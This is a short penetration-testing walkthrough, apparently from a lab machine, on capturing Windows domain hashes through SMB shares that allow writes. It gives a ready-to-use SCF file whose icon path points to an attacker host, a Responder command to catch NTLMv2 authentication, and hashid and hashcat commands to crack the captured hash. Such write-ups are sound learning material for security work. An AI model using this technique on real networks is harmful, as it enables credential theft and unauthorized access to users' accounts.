# SMB SCF File Attacks

SMB is a protocol which is widely used file sharing protocol. If unauthenticated writes are enabled it is possible to obtain passwords hashes of domain users.

SCF (Shell Command Files) can be used to access arbitrary UNC path which allows one to. (Universal Naming Convention) A standard for identifying servers, printers and other resources in a network. UNC paths use double slashes or backslashes to precede the name of the computer

The code below can be saved as "@helper.scf" (the @ will make the file appear at the top of the sharedrive)

[Shell]
Command=2
IconFile=\\10.10.10.10\share\test.ico
[Taskbar]
Command=ToggleDesktop

When the user browses to connection will established automatically from their system to the UNC path that is contained inside the SCF file. Windows will try to authenticate to that share with the username and the password of the user. During that authentication process a random 8 byte challenge key is sent from the server to the client and the hashed NTLM/LANMAN password is encrypted again with this challenge key. Responder will capture the NTLMv2 hash.

start responder

sudo responder -wrf --lm -v -I tun0

upload the .scf file and wait.

save the hashes in a textfile, run hashid and crack

$ hashid -m hashes.txt                                                                
--File 'hashes.txt'--
Analyzing 'tony::DRIVER:e5114168b2dba372:3D9095E0C805BE0B85819511D3BDD0E9:01010000000000000618B47CF7BCD701B6DC2D25F02F783500000000020000000000000000000000'
[+] NetNTLMv2 [Hashcat Mode: 5600]

$ hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt